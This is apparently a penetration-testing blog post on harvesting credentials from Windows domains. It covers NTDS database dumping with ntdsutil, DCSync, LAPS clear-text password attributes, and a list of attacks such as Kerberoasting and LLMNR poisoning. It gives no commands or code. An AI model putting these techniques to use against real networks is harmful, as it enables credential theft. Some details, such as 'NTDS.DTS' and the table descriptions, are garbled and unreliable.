Credential Harvesting (Part 3)

 






Domain Controller

New Technologies Directory Services (NTDS) is a database that contains all Active Directory data, including objects, attributes, credentials, etc. The NTDS.DTS data consists of following three tables:
  1. Schema Table contains types of objects and their relationships. 
  2. Link Table contains the object's attributes and their values.
  3. Data Type contains users and groups.

Ntdsutil is a Windows utility tool to manage and maintain Active Directory configurations. It can be used to:

  1. Restore deleted objects in AD.
  2. Perform maintenance for the AD database.
  3. AD snapshot management.
  4. Set Directory Services Restore Mode (DSRM) administrative passwords.

Local dumping is usually done if there are no credentials available but there is administrator access to the domain controller. Also, the popular attack DC Sync can be used to dump credentials remotely. The penetration tester can leverage these configurations to perform domain replication. 

Local Administrator Password Solution (LAPS)

There is a built-in Administrator account in a Windows OS, that can be accessed via password. But changing passwords in a large Windows environment is challenging. Hence, Microsoft used Group Policy Preference (GPP) to implement a method for changing local administrator accounts across workstations.

After the deployment of GPP, different XML files are created in the SYSVOL folder. However, in 2015, Microsoft stopped storing the encrypted password in the SYSVOL folder and introduced Local Administrator Password Solution. LAPS offers a much more secured approach to remotely manage the local administrator password. 

This new method includes two new attributes of computer objects in AD. One of them contains a clear-text password of the local administrator, while the other contains the expiration time to reset the password. There are many other attacks to obtain credentials from memory or various files within the Windows operating system, they are:
  1. Kerberoasting.
  2. AS-REP Roasting.
  3. SMB Relay Attack.
  4. LLMNR/NBNS Poisoning.

Conclusion:

This marks the end of Credential harvesting related topics here.








 



































Comments

Popular posts from this blog

Deployment (Part 3)

Deployment (Part 1)

Project Resourcing (Part 2)